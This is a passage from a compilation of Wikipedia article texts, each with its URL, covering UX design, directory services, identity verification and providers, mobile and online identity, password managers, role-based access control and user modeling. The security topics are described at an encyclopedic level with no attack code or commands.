use a range of deliverables to communicate their design ideas and research findings to stakeholders.[26]Regarding UX specification documents, these requirements depend on the client or the organization involved in designing a product. The four major deliverables are: a title page, an introduction to the feature, wireframes, and a version history.[27]Depending on the type of project, the specification documents can also include flow models, cultural models, personas, user stories, scenarios, and any prior user research.[26] The deliverables that UX designers will produce as part of their job include wireframes, prototypes, user flow diagrams, specification and tech docs, websites and applications, mockups, presentations, personas, user profiles, videos, and, to a lesser degree, reports.[28]Documenting design decisions, in the form of annotated wireframes, gives the developer the necessary information they may need to successfully code the project.[29] Requires: A user experience designer is considered a UX practitioner, along with the following job titles: user experience researcher, information architect, interaction designer, human factors engineer, business analyst, consultant, creative director, interaction architect, and usability specialist.[31] Interaction designers (IxD) are responsible for understanding and specifying how the product should behave. This work overlaps with the work of both visual and industrial designers in a couple of important ways. When designing physical products, interaction designers must work with industrial designers early on to specify the requirements for physical inputs and to understand the behavioral impacts of the mechanisms behind them. Interaction designers cross paths with visual designers throughout the project. Visual designers guide the discussions of the brand and emotive aspects of the experience, Interaction designers communicate the priority of information, flow, and functionality in the interface.[32] Historically, technical and professional communication(TPC)has been as an industry that practices writing and communication. However, recently UX design has become more prominent in TPC as companies look to develop content for a wide range of audiences and experiences.[33]It is now an expectation that technical and professional skills should be coupled with UX design. According to Verhulsdonck, Howard, and Tham, "...it is not enough to write good content. According to industry expectations, next to writing good content, it is now also crucial to design good experiences around that content."[33]Technical communicators must now consider different platforms such as social media and apps, as well as different channels like web and mobile.[33] In a similar manner, coupling TPC with UX design allows technical communicators to garner evidence on target audiences. UX writers, a branch of technical communicators, specialize in crafting content for mobile platforms while executing a user-centered approach. UX writers focus on developing content to guide users through interfaces, applications, and websites. Their responsibilities include maintaining UI text, conducting user research for usability testing, and developing the tone for a product's communication.[34] UX writers maintain the practices of technical communicators, by developing documentation that establishes consistency in terminology and tone, promoting a cohesive user experience. However, beyond the writing, UX writers maintain UI text by ensuring that microscopy, such as button labels, error messages, and tooltips, remains user-friendly, as well. In doing this, the writers are also tasked with ensuring accessibility—considering issues like screen reader compatibility or providing non-text elements, such as icons. UX writers conduct extensive research to understand the behaviors and preferences of the target audience through user testing and feedback analysis. These methods of research can include user persona creation and user surveys. Lastly, when setting the tone in a product's communication, UX writers highlight factors that affect user engagement and perception. In short, the writers consider the product's emotional impact on the users, and align the tone with brand's personality.[34][35] Within the field of UX design, UX writers bridge the gaps between various fields to create a cohesive and user-centric experience. Their expertise in language and communication work to unify design, development, and user research teams by ensuring that the user interface's content aligns with the broader objectives of the product or service. By focusing on clarity, consistency, and empathy, UX writers contribute to the integration of design elements, technical functionality, and user preferences, while following a design process to ensure products with intuitive, accessible, and responsive behavior to user needs.[36] User interface (UI) design is the process of making interfaces in software or computerized devices with a focus on looks or style. Designers aim to create designs users will find easy to use and pleasurable. UI design typically refers to graphical user interfaces but also includes others, such as voice-controlled ones.[37] The visual designer ensures that the visual representation of the design effectively communicates the data and hints at the expected behavior of the product. At the same time, the visual designer is responsible for conveying the brand ideals in the product and for creating a positive first impression; this responsibility is shared with the industrial designer if the product involves hardware. In essence, a visual designer must aim for maximumusabilitycombined with maximum desirability. Visual designer need not be good in artistic skills but must deliver the theme in a desirable manner.[38] Usability testing is the most common method designers use to test their designs. The basic idea behind conducting a usability test is to check whether the design of a product or brand works well with the target users. Usability testing is about testing whether the product's design is successful and, if not, how it can be improved. While designers conduct tests, they are not testing for the user but for the design. Further, every design is evolving, with both UX design and design thinking moving in the direction of Agile software development.[39]The designers carry out usability testing as early and often as possible, ensuring that every aspect of the final product has been tested.[40] Usability tests play an important role in the delivery of a cohesive final product; however, a variety of factors influence the testing process. Evaluating qualitative and quantitative methods provides an adequate picture of UX designs, and one of these quantitative methods is A/B testing (seeUsability testing). Another key concept in the efficacy of UX design testing is the idea of a persona or the representation of the most common user of a certain website or program, and how these personas would interact with the design in question.[41]At the core of UX design usability testing is the user; however, steps in automating design testing have been made, with Micron developing the Advanced Test Environment (ATE), which automates UX tests on Android-powered smartphones. While quantitative software tools that collect actionable data, such as loggers and mobile agents, provide insight into a user's experience, the qualitative responses that arise from live, user based UX design testing are lost. The ATE serves to simulate a devices movement that affects design orientation and sensor operation in order to estimate the actual experience of the user based on previously collected user testing data.[42]
https://en.wikipedia.org/wiki/User_experience_design
Human–city interactionis the intersection betweenhuman-computer interactionandurban computing. The area involves data-driven methods such as analysis tools, prediction methods to present the solutions to urban design problems. Practitioners, Designers, software engineers in this area employ large sets of user-centric data to design urban environments with high levels of interactivity.[1]This discipline mainly focuses on the user perspective and devises various interaction design between the citizen (user) and various urban entities. Common examples in the discipline include the interactivity between human and buildings,[2]Interaction between Human and IoT devices,[3]participatory and collective urban design,[4]and so on. The discipline attracts growing interests from people of various background such as designers, urban planners, computer scientists, and even architecture. Although the design canvas between human and city is board, Lee et al. proposed a framework considering the multi-disciplinary interests (Urban, Computers and Human) together,[5]in which the emerging technologies such asextended reality(XR) can serve as a platform for such co-design purposes.[6] This computing article is astub. You can help Wikipedia byexpanding it. Thisdesign-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Human_City_Interaction
Incomputing, adirectory serviceorname servicemaps the names of network resources to their respectivenetwork addresses. It is a shared information infrastructure for locating, managing, administering and organizing everyday items and network resources, which can include volumes, folders, files, printers, users, groups, devices, telephone numbers and other objects. A directory service is a critical component of anetwork operating system. Adirectory serverorname serveris aserverwhich provides such a service. Each resource on the network is considered anobjectby the directory server. Information about a particular resource is stored as a collection ofattributesassociated with that resource or object. A directory service defines anamespacefor the network. The namespace is used to assign aname(unique identifier) to each of the objects. Directories typically have a set of rules determining how network resources are named and identified, which usually includes a requirement that the identifiers beuniqueandunambiguous. When using a directory service, a user does not have to remember the physical address of a network resource; providing a name locates the resource. Some directory services includeaccess controlprovisions, limiting the availability of directory information toauthorized users. Several things distinguish a directory service from arelational database. Data can be made redundant if it aids performance (e.g. by repeating values through rows in a table instead of relating them to the contents of a different table through a key, which technique is calleddenormalization; another technique could be the utilization ofreplicasfor increasing actual throughput).[1] Directory schemas are object classes, attributes, name bindings and knowledge (namespaces) where an object class has: Attributes are sometimes multi-valued, allowing multiple naming attributes at one level (such as machine type and serial numberconcatenation, or multiple phone numbers for "work phone"). Attributes and object classes are usually standardized throughout the industry; for example,X.500attributes and classes are often formally registered with theIANAfor their object ID.[citation needed]Therefore, directory applications try to reuse standard classes and attributes to maximize the benefit of existing directory-server software. Object instances are slotted into namespaces; each object classinheritsfrom its parent object class (and ultimately from the root of thehierarchy), adding attributes to the must-may list. Directory services are often central to thesecuritydesign of an IT system and have a correspondingly-fine granularity of access control. Replicationand distribution have distinct meanings in the design and management of a directory service. Replication is used to indicate that the same directory namespace (the same objects) are copied to another directory server for redundancy and throughput reasons; the replicated namespace is governed by the same authority. Distribution is used to indicate that multiple directory servers in different namespaces are interconnected to form a distributed directory service; each namespace can be governed by a different authority. Directory services were part of anOpen Systems Interconnection(OSI) initiative for common network standards and multi-vendor interoperability. During the 1980s, theITUandISOcreated theX.500 set of standardsfor directory services, initially to support the requirements of inter-carrier electronic messaging and network-name lookup. TheLightweight Directory Access Protocol(LDAP) is based on the X.500 directory-information services, using theTCP/IP stackand an X.500Directory Access Protocol(DAP) string-encoding scheme on theInternet. Systems developed before the X.500 include: LDAP/X.500-based implementations include: Open-source tools to create directory services include OpenLDAP, theKerberos protocolandSamba software, which can function as a Windowsdomain controllerwith Kerberos and LDAPback ends. Administration is by GOsa or Samba SWAT. Name services on Unix systems are typically configured throughnsswitch.conf. Information from name services can be retrieved withgetent.
https://en.wikipedia.org/wiki/Directory_service
Anidentity verification serviceis used by businesses to ensure that users or customers provide information that is associated with the identity of a real person. The service may verify the authenticity of physical identity documents such as adriver's license,passport, or a nationally issuedidentity documentthrough documentary verification. Additionally, also involve the verification of identity information (fields) against independent and authoritative sources, such as acredit bureauor proprietary government data. Identity verification services were developed to help companies comply withAnti-Money Laundering(AML) andKnow Your Customer(KYC) rules, identity verification is now a vital component to the transaction ecosystems of eCommerce companies, financial institutions, online gaming, and evensocial media. Through adopting digital fraud prevention methods, businesses can achieve AML and KYC compliance while addressing the risks associated with fraud.[1] In financial industries, verifying identity is often required by regulations known asKnow Your CustomerorCustomer Identification Program. In the US, one of the many bodies regulating these procedures is theFinancial Crimes Enforcement Network(FinCEN). TheFinancial Actions Task Force(FATF) is a global anti-money laundering and terrorist financing watchdog organization. A nondocumentary identity verification requires the user or customer to provide personal identity data, which is sent to the identity verification service.[2]The service checks public and proprietary private databases for a match on the information provided. Optionally,knowledge-based authenticationquestions can be presented to the person providing the information to ensure that he or she is the owner of the identity. Anidentity "score"is calculated, and the identity of the user or customer is either given the "verified" status or not, based on the score. Customers of various businesses, such as retail merchants, government entities, or financial institutions, are often required to present an identification to complete a transaction. For instance, a merchant may require customer identification for various types of purchases (e.g., alcohol, lottery, or tobacco purchases) or when certain types of payments (e.g., checks, credit cards) are presented to pay for transactions. Financial institutions usually require customers to present a form of identification to complete a withdrawal or deposit transaction, cash a check, or open a new account. Government entities may require identification for access into secure areas or other purposes. Other businesses may also require identification from customers. An additional method to service Identity Verification that is gaining industry prominence isartificial intelligence, more commonly referred to as artificial intelligence–based identity verification.[citation needed]ID verification is performed through a webcam, and the results are available in real time and are more accurate than the untrained eye.[3]However, there have been concerns aboutEurocentricbias in artificial intelligence[4]and how that could affect the accuracy of results. Industries that use identity verification services include financial services, digital businesses, travel and leisure, sharing economy businesses, telecom, FinTech, gaming and entertainment.[5] Identity verification services exist both online and in-person to verify identities. These services are used in the financial service industry, e-commerce platforms,social networking sites,Internet forums,dating sites, andwikisto curbsockpuppetry, underage signups,spammingand illegal activities like harassment, Identity fraud, andmoney laundering. For example, in banking, identity verification may be required in order to open a bank account. There is an increasing call for regulation with the rise in popularity ofcryptocurrencyexchanges. In December 2020 the U.S. government'sFinancial Crimes Enforcement Network(FinCEN) has proposed rules to require banks andmoney service businesses(“MSBs”) such ascryptocurrency walletsto submit reports, keep records, and verify the identity of users who perform transactions with convertible virtual currency.[6][7]
https://en.wikipedia.org/wiki/Identity_verification_service
Anidentity provider(abbreviatedIdPorIDP) is a system entity that creates, maintains, and manages identity information forprincipalsand also provides authentication services to relying applications within a federation or distributed network.[1]Identity providers offer user authentication as a service. Relying party applications, such as web applications, outsource the user authentication step to a trusted identity provider. Such a relying party application is said to befederated, that is, it consumesfederated identity. An identity provider is “a trusted provider that lets you usesingle sign-on(SSO) to access other websites.” SSO enhances usability by reducingpassword fatigue. It also provides better security by decreasing the potentialattack surface. Identity providers can facilitate connections betweencloud computingresources and users, thus decreasing the need for users to re-authenticate when using mobile and roaming applications.[citation needed] OpenID Connect(OIDC) is an identity layer on top ofOAuth. In the domain model associated with OIDC, an identity provider is a special type of OAuth 2.0 authorization server. Specifically, a system entity called an OpenID Provider issuesJSON-formatted identitytokensto OIDC relying parties via aRESTfulHTTPAPI. TheSecurity Assertion Markup Language(SAML) is a set of profiles for exchanging authentication and authorization data across security domains. In the SAML domain model, an identity provider is a special type of authentication authority. Specifically, aSAML identity provideris a system entity that issues authentication assertions in conjunction with an SSO profile of SAML. A relying party that consumes these authentication assertions is called aSAML service provider.[citation needed]
https://en.wikipedia.org/wiki/Identity_provider
Mobile identityis a development of onlineauthenticationanddigital signatures, where theSIMcard of one's mobile phone works as an identity tool. Mobile identity enables legally binding authentication and transaction signing foronline banking, payment confirmation, corporate services, and consuming online content. The user's certificates are maintained on the telecom operator's SIM card and in order to use them, the user has to enter a personal, secretPIN code. When using mobile identity, no separatecard readeris needed, as the phone itself already performs both functions. In contrast to other approaches, the mobile phone in conjunction with amobile signature-enabled SIM card aims to offer the same security and ease of use as for examplesmart cardsin existingdigital identitymanagement systems. Smart card-based digital identities can only be used in conjunction with a card reader and aPC. In addition, distributing and managing the cards can be logistically difficult, exacerbated by the lack ofinteroperabilitybetween services relying on such a digital identity.[citation needed] There are a number of private companystakeholdersthat have an inherent interest in setting up a mobile signature service infrastructure to offer mobile identity services. These stakeholders aremobile network operatorsand, to a certain extent, financial institutions or service providers with an existing large customer base, that could leverage the use of mobile signatures across several applications. TheFinnish governmenthas supervised the deployment of a common derivative of theETSI-based mobile signature service standard, thus allowing theFinnishmobile operators to offer mobile signature services. The Finnish governmentcertificate authority(CA) also issues the certificates that link thedigitalkeys on theSIMcard to the person's real world identity.[1][2][3] Through national mobile register program Iranian customs administration and ministry of ict registers database fromIMEIof imported legally phones and allows Iranian citizens to only access full Iranian mobile phone operators national roaming network if they have linked their national ID to both Simcards and also non contraband/smuggled IMEI number.[4] In theNordic region, governments, public sector and financial institutions are increasingly offering online and mobile channels to access their services. InSwedenthe WPK consortium, owned by banks and mobile operators, specifies a mobile signature service infrastructure that is used by banks to authenticate online banking users. Telenor Sverigehas provided technology for the company's mobile signature services in Sweden since 2009. Telenor enables its customers a secure login to online services using their mobile phone for authentication and digital signing.[5] TheEstonian governmentissues all citizens with a smart card and digital identity called theEstonian ID card. Additionally,Sertifitseerimiskeskus, thecertificate authorityof Estonia issues special SIM cards to mobile phones which act as national personal identification method. The service is calledm-id. In 2007, the mobile operatorTurkcellbought a mobile signature service infrastructure Gemalto and launched Mobillmza, the world's first mobile security solution.[6][7]They have partnered up with over 200 businesses, including many banks to enable them to use mobile signatures for online user authentication.[8] Other services relying on mobile signatures in Turkey include securing the withdrawal of small loans from anATM, and processing custom work flow processes by enabling applicants to use mobile signatures.[9][10][11][12] TheAustrian governmentallows private sector companies to propose means for storing the government-controlled digital identity. Since 2006, the Austrian government has explicitly mentioned mobile phones as one of the likely devices to be used for storing and managing adigital identity. Eight Austrian saving banks will launch[when?]a pilot allowing online user authentication with mobile signatures.[13] In Ukraine,Mobile IDproject started in 2015, and later declared as one ofGovernment of Ukrainepriorities supported by EU. At the beginning of 2018 Ukrainian cell operators are evaluating proposals and testing platforms from different local and foreign developers. Platform selection will be followed up by comprehensive certification process. Ukrainian IT andcryptographyaround Mobile ID topic is mostly presented byInnovation Development HUB LLCwith its ownMobile ID platform. This particular solution is the sole, having already passed the certification, and most likely will be implemented in Ukraine. As of September 2019, all of 'big three' cell operators in Ukraine have launched Mobile ID service. Vodafone- commercial launch in August 2018. Kyivstar- commercial launch in December 2018. Lifecell- commercial launch in August 2019. Vodafone and Lifecell operators implemented Mobile ID solution of Ukrainian origin designed by Innovation Development HUB LLC.
https://en.wikipedia.org/wiki/Mobile_identity_management
Online identity management(OIM), also known asonline image management,online personal branding,orpersonal reputation management(PRM), is a set of methods for generating a distinguishedweb presenceof a person on the Internet. Online identity management also refers to identity exposure and identity disclosure, and has particularly developed in the management ononline identityinsocial network servicesoronline dating services.[1][2] Identity management is also an important building block of cybersecurity. It forms the basis for most access control types and establishing accountability online.[3] One aspect of the online identity management process has to do with improving the quantity and quality of traffic to sites that have content related to a person. In that aspect, OIM is a part of another discipline calledsearch engine optimizationwith the difference that the onlykeywordis the person's name, and the optimization object is not necessary a single web site; it can consider a set of completely different sites that contain positive online references. The objective in this case is to get high rankings for as many sites as possible when someone search for a person's name. If the search engine used is Google, this action is called "to googlesomeone".[4] Another aspect has to do withimpression management, i.e. "the process through which people try to control the impressions other people form of them". One of the objectives, in particular, is to increase the onlinereputationof the person. Pseudonyms are sometimes used to protect the true online identity of individuals from harm. This can be the case when presenting unpopular views or dissenting opinion online in a way that will not affect the true identity of the author.Facebookestimates that up to 11.2% of accounts are fake.[5]Many of these profiles are used as logins to protect the true identity of online authors.[citation needed] An individual's presence could be reflected in any kind of content that refers to that person, including news, participation in blogs and forums, personal web sites,[6]social media presence, pictures, video, etc. Because of that, online identity management often involves participation insocial mediasites like Facebook,Google+,LinkedIn,Flickr,YouTube,Twitter,Last.fm,Myspace, Quora, Tumblr,Pinterestand other online communities and community websites, and is related to blogging, blog social networks like MyBlogLog and blog search engines likeTechnorati. OIM can serve specific purposes such as a professional networking platform. OSN platforms represent who the user is and what attributes they bring to the world. The information a user can plug into their profile is usually not verified, which can lead to specifics forms of false identity.[7]OIM can also consist in more questionable practices such as the case of buying "likes", "friends", or "subscribers".[8] The Objective of Online Identity Management is to: Online Identity management can be utilized on a personal and professional level. Online identity management utilizes web presence to gain attention from potential huge clients to followers. A person managing online identity will use social media sites like Twitter, Facebook, Instagram Youtube, Snapchat, and networking sites to increase their online activity. They also use other tools like search engine optimization and advertisements to boost their audience and gain insights on their audience. Online Identity Management is most effective with the use of all social networking sites and posting frequently. This technique is used to target their audience and to make sure their audience does not miss any content. Additionally, Online Identity Management can be used to manipulate followers, viewers, and clients by using misleading or over-exaggerated information.[10] The reason why someone would be interested in doing online identity management is closely related to the increasing number of constituencies that use the internet as a tool to find information about people. A survey by CareerBuilder.com found that one in four hiring managers used search engines to screen candidates. One in 10 also checked candidates' profiles on social networking sites such as Facebook, Instagram, Twitter, Youtube and other communicative networks.[11]According to a December 2007 survey by the Ponemon Institute, a privacy research organization, roughly half of U.S. hiring officials use the Internet in vetting job applications.[12]Online identity management may also be used to increase an individual's professional online presence. When practicing online identity management, employers receive a satisfied notion regarding their candidate's professional attitudes and personality. This may result in a candidate receiving the job based on their professional online presence.[13]Online Identity management is key to having a successful business and relationship with the public. An online presence is vital to the digital world we live in today. Many employers check the social network account of their candidate to grasp the kind of person they are. Even after being hired companies will continuously check account to ensure professionalism and company privacy is being maintained.[10] The concept of manipulating search results to show positive results is intriguing for both individuals and businesses. Individuals that want to hide from their past can use OIM to repair their online image and suppress content that damages their credibility, employability and reputation. By changing what people see when searching for an individual, they are able to create a completely new and positive identity in its place. In 2014, the EU ruled that people have "Theright to be forgotten", and that in some circumstances content can be removed from Google's search index. In 1988, the European Union passed the Safe Harbor Act which prohibited the sharing unauthorized personal information. Many companies to this day voluntarily comply to this law; however, it is the job of the user to fully ensure the safety of their online identity. The European Union later passed the a landmark ruling back in 2014, that stated that all individuals have the "right to be forgotten". This granted user's the removal of all irrelevant data that could harm one's online identity[13] Online identity management is also a factor and important when a person is seeking a need or good. Depending on companies online viewers and content can encourage or discourage a sale. Online identity management is important because decisions can be made depending on online activity. Depending on the motives of the goods, company, and person their online identity should serve the purpose of heightening their likeness, attractiveness, and exposure.
https://en.wikipedia.org/wiki/Online_identity_management
Apassword manageris a software program to preventpassword fatiguebyautomatically generating,autofillingand storingpasswords.[1][2]It can do this forlocal applicationsorweb applicationssuch asonline shopsorsocial media.[3]Web browserstend to have a built-in password manager. Password managers typically require a user to create and remember a single password to unlock to access the stored passwords. Password managers can integratemulti-factor authentication. The first password manager software designed to securely store passwords wasPassword Safecreated byBruce Schneier, which was released as a free utility on September 5, 1997.[4]Designed forMicrosoftWindows 95, Password Safe used Schneier'sBlowfishalgorithmto encrypt passwords and other sensitive data. Although Password Safe was released as a free utility, due toexport restrictions on cryptography from the United States, only U.S. and Canadian citizens and permanent residents were initially allowed to download it.[4] As of October 2024[update], the built-in Google Password Manager inGoogle Chromebecame the most used password manager.[5] Some applications store passwords as an unencrypted file, leaving the passwords easily accessible tomalwareor people attempted to steal personal information. Some password managers require a user-selected master password orpassphraseto form thekeyused to encrypt passwords stored for the application to read. The security of this approach depends on the strength of the chosen password (which may be guessed through malware), and also that the passphrase itself is never stored locally where a malicious program or individual could read it. A compromised master password may render all of the protected passwords vulnerable, meaning that a single point of entry can compromise the confidentiality of sensitive information. This is known as asingle point of failure. While password managers offer robust security for credentials, their effectiveness hinges on the user's device security. If a device is compromised by malware like Raccoon, which excels at stealing data, the password manager's protections can be nullified. Malware like keyloggers can steal the master password used to access the password manager, granting full access to all stored credentials. Clipboard sniffers can capture sensitive information copied from the manager, and some malware might even steal the encrypted password vault file itself. In essence, a compromised device with password-stealing malware can bypass the security measures of the password manager, leaving the stored credentials vulnerable.[6] As with password authentication techniques,key loggingor acoustic cryptanalysis may be used to guess or copy the "master password". Some password managers attempt to usevirtual keyboardsto reduce this risk - though this is still vulnerable to key loggers.[7]that take the keystrokes and send what key was pressed to the person/people trying to access confidential information. Cloud-based password managers offer a centralized location for storing login credentials. However, this approach raises security concerns. One potential vulnerability is a data breach at the password manager itself. If such an event were to occur, attackers could potentially gain access to a large number of user credentials.A 2022 security incident involving LastPassexemplifies this risk.[6] Some password managers may include a password generator. Generated passwords may be guessable if the password manager uses a weak method ofrandomly generating a "seed"for all passwords generated by this program. There are documented cases, like the one withKasperskyPassword Manager in 2021, where a flaw in the password generation method resulted in predictable passwords.[8][9] A 2014 paper by researchers atCarnegie Mellon Universityfound that while browsers refuse to autofill passwords if the login page protocol differs from when the password was saved (HTTPvs.HTTPS), some password managers insecurely filled passwords for the unencrypted (HTTP) version of saved passwords for encrypted (HTTPS) sites. Additionally, most managers lacked protection againstiframeandredirection-basedattacks, potentially exposing additional passwords whenpassword synchronizationwas used across multiple devices.[10] Various high-profile websites have attempted to block password managers, often backing down when publicly challenged.[11][12][13]Reasons cited have included protecting againstautomated attacks, protecting againstphishing, blockingmalware, or simply denying compatibility. TheTrusteerclient security software fromIBMfeatures explicit options to block password managers.[14][15] Such blocking has been criticized byinformation securityprofessionals as making users less secure.[13][15]The typical blocking implementation involves settingautocomplete='off'on the relevant passwordweb form. This option is now consequently ignored onencrypted sites,[10]such asFirefox38,[16]Chrome34,[17]andSafarifrom about 7.0.2.[18] In recent years, some websites have made it harder for users to rely on password managers by disabling features like password autofill or blocking the ability to paste into password fields. Companies like T-Mobile, Barclaycard, and Western Union have implemented these restrictions, often citing security concerns such as malware prevention, phishing protection, or reducing automated attacks. However, cybersecurity experts have criticized these measures, arguing they can backfire by encouraging users to reuse weak passwords or rely on memory alone—ultimately making accounts more vulnerable. Some organizations, such asBritish Gas, have reversed these restrictions after public feedback, but the practice still persists on many websites.[19]
https://en.wikipedia.org/wiki/Password_management
In computer systems security,role-based access control(RBAC)[1][2]orrole-based security[3]is an approach to restricting system access to authorized users, and to implementingmandatory access control (MAC)ordiscretionary access control (DAC). Role-based access control is a policy-neutral access control mechanism defined around roles and privileges. The components of RBAC such as role-permissions, user-role and role-role relationships make it simple to perform user assignments. A study by NIST has demonstrated that RBAC addresses many needs of commercial and government organizations.[4]RBAC can be used to facilitate administration of security in large organizations with hundreds of users and thousands of permissions. Although RBAC is different from MAC and DAC access control frameworks, it can enforce these policies without any complication. Within an organization,rolesare created for various job functions. The permissions to perform certain operations are assigned to specific roles. Since users are not assigned permissions directly, but only acquire them through their role (or roles), management of individual user rights becomes a matter of simply assigning appropriate roles to the user's account; this simplifies common operations, such as adding a user, or changing a user's department. Three primary rules are defined for RBAC: Additional constraints may be applied as well, and roles can be combined in ahierarchywhere higher-level roles subsume permissions owned by sub-roles. With the concepts of role hierarchy and constraints, one can control RBAC to create or simulatelattice-based access control(LBAC). Thus RBAC can be considered to be a superset of LBAC. When defining an RBAC model, the following conventions are useful: A constraint places a restrictive rule on the potential inheritance of permissions from opposing roles. Thus it can be used to achieve appropriateseparation of duties. For example, the same person should not be allowed to both create a login account and to authorize the account creation. Thus, usingset theory notation: A subject may havemultiplesimultaneous sessions with/in different roles. The NIST/ANSI/INCITSRBAC standard (2004) recognizes three levels of RBAC:[5] RBAC is a flexible access control technology whose flexibility allows it to implementDAC[6]orMAC.[7]DAC with groups (e.g., as implemented in POSIX file systems) can emulate RBAC.[8]MAC can simulate RBAC if the role graph is restricted to a tree rather than apartially ordered set.[9] Prior to the development of RBAC, theBell-LaPadula(BLP) model was synonymous with MAC andfile system permissionswere synonymous with DAC. These were considered to be the only known models for access control: if a model was not BLP, it was considered to be a DAC model, and vice versa. Research in the late 1990s demonstrated that RBAC falls in neither category.[10][11]Unlikecontext-based access control(CBAC), RBAC does not look at the message context (such as a connection's source). RBAC has also been criticized for leading to role explosion,[12]a problem in large enterprise systems which require access control of finer granularity than what RBAC can provide as roles are inherently assigned to operations and data types. In resemblance to CBAC, an Entity-Relationship Based Access Control (ERBAC, although the same acronym is also used for modified RBAC systems,[13]such as Extended Role-Based Access Control[14]) system is able to secure instances of data by considering their association to the executing subject.[15] Access control lists(ACLs) are used in traditional discretionary access-control (DAC) systems to affect low-level data-objects. RBAC differs from ACL in assigning permissions to operations which change the direct-relations between several entities (see:ACLgbelow). For example, an ACL could be used for granting or denying write access to a particular system file, but it wouldn't dictate how that file could be changed. In an RBAC-based system, an operation might be to 'create a credit account' transaction in a financial application or to 'populate a blood sugar level test' record in a medical application. A Role is thus a sequence of operations within a larger activity. RBAC has been shown to be particularly well suited to separation of duties (SoD) requirements, which ensure that two or more people must be involved in authorizing critical operations. Necessary and sufficient conditions for safety of SoD in RBAC have been analyzed. An underlying principle of SoD is that no individual should be able to effect a breach of security through dual privilege. By extension, no person may hold a role that exercises audit, control or review authority over another, concurrently held role.[16][17] Then again, a "minimal RBAC Model",RBACm, can be compared with an ACL mechanism,ACLg, where only groups are permitted as entries in the ACL. Barkley (1997)[18]showed thatRBACmandACLgare equivalent. In modernSQLimplementations, likeACL of theCakePHPframework, ACLs also manage groups and inheritance in a hierarchy of groups. Under this aspect, specific "modern ACL" implementations can be compared with specific "modern RBAC" implementations, better than "old (file system) implementations". For data interchange, and for "high level comparisons", ACL data can be translated toXACML. Attribute-based access control orABACis a model which evolves from RBAC to consider additional attributes in addition to roles and groups. In ABAC, it is possible to use attributes of: ABAC is policy-based in the sense that it uses policies rather than static permissions to define what is allowed or what is not allowed. Relationship-based access control orReBACis a model which evolves from RBAC. In ReBAC, a subject's permission to access a resource is defined by the presence of relationships between those subjects and resources. The advantage of this model is that allows for fine-grained permissions; for example, in a social network where users can share posts with other specific users.[19] The use of RBAC to manage user privileges (computer permissions) within a single system or application is widely accepted as a best practice. A 2010 report prepared forNISTby theResearch Triangle Instituteanalyzed the economic value of RBAC for enterprises, and estimated benefits per employee from reduced employee downtime, more efficient provisioning, and more efficient access control policy administration.[20] In an organization with a heterogeneousIT infrastructureand requirements that span dozens or hundreds of systems and applications, using RBAC to manage sufficient roles and assign adequate role memberships becomes extremely complex without hierarchical creation of roles and privilege assignments.[21]Newer systems extend the older NIST RBAC model[22]to address the limitations of RBAC for enterprise-wide deployments. The NIST model was adopted as a standard byINCITSas ANSI/INCITS 359-2004. A discussion of some of the design choices for the NIST model has also been published.[23] Role based access control interference is a relatively new issue in security applications, where multiple user accounts with dynamic access levels may lead to encryption key instability, allowing an outside user to exploit the weakness for unauthorized access. Key sharing applications within dynamic virtualized environments have shown some success in addressing this problem.[24]
https://en.wikipedia.org/wiki/Role-based_access_control
User modelingis the subdivision ofhuman–computer interactionwhich describes the process of building up and modifying a conceptual understanding of the user. The main goal of user modeling is customization andadaptation of systemsto the user's specific needs. The system needs to "say the 'right' thing at the 'right' time in the 'right' way".[1]To do so it needs an internal representation of the user. Another common purpose is modeling specific kinds of users, including modeling of their skills anddeclarative knowledge, for use in automatic software-tests.[2]User-models can thus serve as a cheaper alternative touser testingbut should not replaceuser testing. A user model is the collection and categorization ofpersonal dataassociated with a specific user. A user model is a (data) structure that is used to capture certain characteristics about an individual user, and auser profileis the actual representation in a given user model. The process of obtaining the user profile is called user modeling.[3]Therefore, it is the basis for any adaptive changes to the system's behavior. Which data is included in the model depends on the purpose of the application. It can include personal information such as users' names and ages, their interests, their skills and knowledge, their goals and plans, their preferences and their dislikes or data about their behavior and their interactions with the system. There are different design patterns for user models, though often a mixture of them is used.[2][4] Information about users can begatheredin several ways. There are three main methods: Though the first method is a good way to quickly collect main data it lacks the ability to automatically adapt to shifts in users' interests. It depends on the users' readiness to give information and it is unlikely that they are going to edit their answers once the registration process is finished. Therefore, there is a high likelihood that the user models are not up to date. However, this first method allows the users to have full control over the collected data about them. It is their decision which information they are willing to provide. This possibility is missing in the second method. Adaptive changes in a system that learns users' preferences and needs only by interpreting their behavior might appear a bit opaque to the users, because they cannot fully understand and reconstruct why the system behaves the way it does.[5]Moreover, the system is forced to collect a certain amount of data before it is able to predict the users' needs with the required accuracy. Therefore, it takes a certain learning time before a user can benefit from adaptive changes. However, afterwards these automatically adjusted user models allow a quite accurate adaptivity of the system. The hybrid approach tries to combine the advantages of both methods. Through collecting data by directly asking its users it gathers a first stock of information which can be used for adaptive changes. By learning from the users' interactions it can adjust the user models and reach more accuracy. Yet, the designer of the system has to decide, which of these information should have which amount of influence and what to do with learned data that contradicts some of the information given by a user. Once a system has gathered information about a user it can evaluate that data by preset analytical algorithm and then start to adapt to the user's needs. These adaptations may concern every aspect of the system's behavior and depend on the system's purpose. Information and functions can be presented according to the user's interests, knowledge or goals by displaying only relevant features, hiding information the user does not need, making proposals what to do next and so on. One has to distinguish betweenadaptive and adaptable systems.[1]In an adaptable system the user can manually change the system's appearance, behavior or functionality by actively selecting the corresponding options. Afterwards the system will stick to these choices. In anadaptive systema dynamic adaption to the user is automatically performed by the system itself, based on the built user model. Thus, an adaptive system needs ways to interpret information about the user in order to make these adaptations. One way to accomplish this task is implementing rule-based filtering. In this case a set of IF... THEN... rules is established that covers theknowledge baseof the system.[2]The IF-conditions can check for specific user-information and if they match the THEN-branch is performed which is responsible for the adaptive changes. Another approach is based oncollaborative filtering.[2][5]In this case information about a user is compared to that of other users of the same systems. Thus, if characteristics of the current user match those of another, the system can make assumptions about the current user by presuming that he or she is likely to have similar characteristics in areas where the model of the current user is lacking data. Based on these assumption the system then can perform adaptive changes. A certain number of representation formats and standards are available for representing the users in computer systems,[8]such as:
https://en.wikipedia.org/wiki/User_modeling
